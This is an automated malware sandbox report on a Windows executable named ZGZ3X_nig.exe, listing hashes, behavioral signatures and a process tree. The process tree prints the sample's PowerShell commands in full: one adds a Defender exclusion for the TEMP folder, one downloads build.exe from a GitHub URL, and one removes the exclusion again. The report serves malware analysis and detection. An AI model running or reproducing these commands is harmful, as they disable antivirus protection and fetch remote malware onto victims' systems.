Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
22/03/2025, 05:53
Behavioral task
behavioral1
Sample
ZGZ3X_nig.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
ZGZ3X_nig.exe
Resource
win10v2004-20250314-en
General
-
Target
ZGZ3X_nig.exe
-
Size
57KB
-
MD5
16edd47bf01716b24958a0b3a3a7bcfb
-
SHA1
8b7972f4190c2ca9d600084611e966fa0f899b98
-
SHA256
568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8
-
SHA512
9e6ca1cbfa194aff3aebb60fa7b73ee4ff63f9770cfe1d114b757d55693278ccb8f6a450235255a3ae03ac382b528b899eb973d571523fe12e3910b9568d38e1
-
SSDEEP
768:d5qkvPJg++TldUQJbxc1knPItshRGibgFfYTrTQc1mRdJcWvFM79yipBvSrrCeao:3rPJVKjbcknWSOYvTfkWkFM79yQVFu/
Malware Config
Signatures
-
pid Process 2880 powershell.exe 2584 powershell.exe -
resource yara_rule behavioral1/memory/2680-0-0x0000000140000000-0x0000000140028000-memory.dmp upx behavioral1/memory/2680-28-0x0000000140000000-0x0000000140028000-memory.dmp upx -
Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs
Command interpreters often include specific commands/flags that ignore errors and other hangups.
pid Process 2880 powershell.exe 2960 powershell.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2880 powershell.exe 2584 powershell.exe 2960 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2880 powershell.exe Token: SeDebugPrivilege 2584 powershell.exe Token: SeDebugPrivilege 2960 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 2680 wrote to memory of 2760 2680 ZGZ3X_nig.exe 31 PID 2680 wrote to memory of 2760 2680 ZGZ3X_nig.exe 31 PID 2680 wrote to memory of 2760 2680 ZGZ3X_nig.exe 31 PID 2760 wrote to memory of 2796 2760 cmd.exe 32 PID 2760 wrote to memory of 2796 2760 cmd.exe 32 PID 2760 wrote to memory of 2796 2760 cmd.exe 32 PID 2796 wrote to memory of 2888 2796 net.exe 33 PID 2796 wrote to memory of 2888 2796 net.exe 33 PID 2796 wrote to memory of 2888 2796 net.exe 33 PID 2760 wrote to memory of 2880 2760 cmd.exe 34 PID 2760 wrote to memory of 2880 2760 cmd.exe 34 PID 2760 wrote to memory of 2880 2760 cmd.exe 34 PID 2760 wrote to memory of 2584 2760 cmd.exe 35 PID 2760 wrote to memory of 2584 2760 cmd.exe 35 PID 2760 wrote to memory of 2584 2760 cmd.exe 35 PID 2760 wrote to memory of 2960 2760 cmd.exe 36 PID 2760 wrote to memory of 2960 2760 cmd.exe 36 PID 2760 wrote to memory of 2960 2760 cmd.exe 36
Processes
-
C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\AE9.tmp\AEA.tmp\AEB.bat C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Windows\system32\net.exenet session3⤵
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session4⤵PID:2888
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
- Hide Artifacts: Ignore Process Interrupts
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2880
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2584
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"3⤵
- Hide Artifacts: Ignore Process Interrupts
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2960
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD51c935ef28fdfd394b770d945d7f04d76
SHA129e251c3c40ce4ad1b2984bf26b444aa045d9b21
SHA256aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681
SHA512a9e60f2ac4aec15a3ba0a95df224449f64777a027357792247dd597529542e79128aec996c89ff86a1654911b4b763c577d3c3d2f38c59b02b280b8ad824e7e1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD59e6c51a3f6886d64fc6dfcfc4f376fb4
SHA1da9e5844939fd2b6d823870bb483ecf63855b440
SHA2567a8239e7feee11f3922e57d89df79f9085aea7a1b29aca255eaab35880badb24
SHA512e5f3b4f5ddb515fd5d69f93c21313c18dc0cbe93785b2385f370c2fa8f77acd7c27c67880d25f884037654af8e3fe11b983139d18632b56ece1fd1c5ed223b79